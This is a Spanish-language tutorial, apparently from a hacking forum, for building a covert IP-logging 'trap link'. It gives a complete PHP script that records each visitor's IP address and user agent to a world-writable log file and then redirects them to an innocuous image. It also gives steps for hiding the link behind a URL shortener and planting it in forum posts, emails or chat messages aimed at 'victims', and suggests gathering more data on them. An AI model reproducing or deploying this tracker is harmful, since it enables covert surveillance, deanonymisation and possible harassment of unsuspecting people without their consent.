El procedimieto es de lo mas sencillo, todo se hace a traves de PHP

1. tener un servicio de alojamiento web, que puede ser gratuito y de tu

predileccion.
2. registrar un dominio gratis en este alojamiento web por ejemplo:
www.sacarip.hostgator.com
3. abrir con un editor de texto (bloc de notas por ejemplo) el archivo index.php.
4. en la linea de codigo que dice: header("Location:
https://i.imgur.com/4j2mF3n.jpg");
reemplazar la direccion web de la imagen (imgur en este ejemplo) por la
direccion de cualquier
otra imagen que querramos mostrar.
4.1. NOTA: la direccion web que se reemplaza puede no solo ser una imagen, puede
ser un pagina web
cualquiera, un video, o cualquier otra direccion web.
5. guardar los cambios en el archivos index.php
6. subir los dos archivos adjuntos en el alojamiento que pasaran a ser la nueva
web.
los archivos son: index.php e iplog.txt
4. dar permisos de ejecucion completos al archivo iplog.txt chmod 777, esto se
puede lograr directamente
en el editor de contenidos (file manager) del servicio de alojamiento, y es para
que pueda escribirse en
el los datos recolectados.
5. acortar la direccion de nuestra web pirata con un servicio de acortadores que
prefiramos, puede ser:
bit.ly, google shortener o cualquiera.

PASOS PARA OBTENER LA DIRECCION IP

6. Si queremos saber la direccion ip de alquien por ejemplo via email, chat de
facebook o via web (como
en el caso de foro).
utilizar el link acortado para a�adir la imagen por ejemplo:
[IMG]bit.ly/jai33jd93[/IMG] si es en foro
o el link directo segun sea el caso, en el caso de email, a�adir la imagen al
cuerpo del mail via link.
7. una ves enviado o que sabemos que la victima o victimas han accesado a la
imagen, basta con ir nuevamente
a los archivos que subiemos a la web y abrir o descargar el iplog.txt en donde
estaran todas las ips con sus
respectivos detalles. como por ejemplo:

IP Address:xxx.xxx.xxx.xxx
User Agemt:Mozilla/5.0 (Windows NT x.x) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host Name:28948.us-imm-node3c.000webhost.io
Operating System:#1 SMP Tue Nov 22 16:42:41 UTC 2016(Linux)
�---------------------�
IP Address:xxx.xxx.xxx.xxx
User Agemt:Mozilla/5.0 (Windows NT x.x) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host Name:28948.us-imm-node3c.000webhost.io
Operating System:#1 SMP Tue Nov 22 16:42:41 UTC 2016(Linux)
�---------------------�
IP Address:xxx.xxx.xxx.xxx
User Agemt:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/52.0.2743.75 Safari/537.36
Host Name:28948.us-imm-node3c.000webhost.io
Operating System:#1 SMP Tue Nov 22 16:42:41 UTC 2016(Linux)
En donde la primera linea sera el ip de la victima.
La segunda linea el navegador y sistema operativo.
Etc.

EXPLICACION DE COMO FUNCIONA Y COMO OBTENER MAS DATOS.

el contenido del archivo index.php es el siguiente

<?php
header("Location: DIRECCION WEB A DONDE SE VA A REDIRIJIR A LA VICTIMA");
$file="iplog.txt";
$f=fopen($file,'a');
fwrite($f,"-------------------------"."\n");
fwrite($f,"IP Address:".$_SERVER['REMOTE_ADDR']."\n");
fwrite($f,"User Agemt:".$_SERVER['HTTP_USER_AGENT']."\n");
fclose($f);
?>

la linea header envia o redirige a la victima.

la segunda abre el archivo iplog.txt
la tercera agrega una linea punteada para separar las direcciones ip
la cuarta obtiene o regresa la direccion ip que se va a escribir.
la quinta obtiene o regresa el navegador y sistema operativo por user agent.
la sexta cierra todo el proceso.

NOTA: existen mas handlers o manejadores que nos permiten obtener mas datos de las
victimas
como por ejemplo si utilizan proxy, version exacta del sistema operativo, fecha y
hora de cuando
se acceso al link trampa y muchos mas, podes ampliar buscando informacion sobre
handlers o manejadores PHP.

Basicamente eso es todo.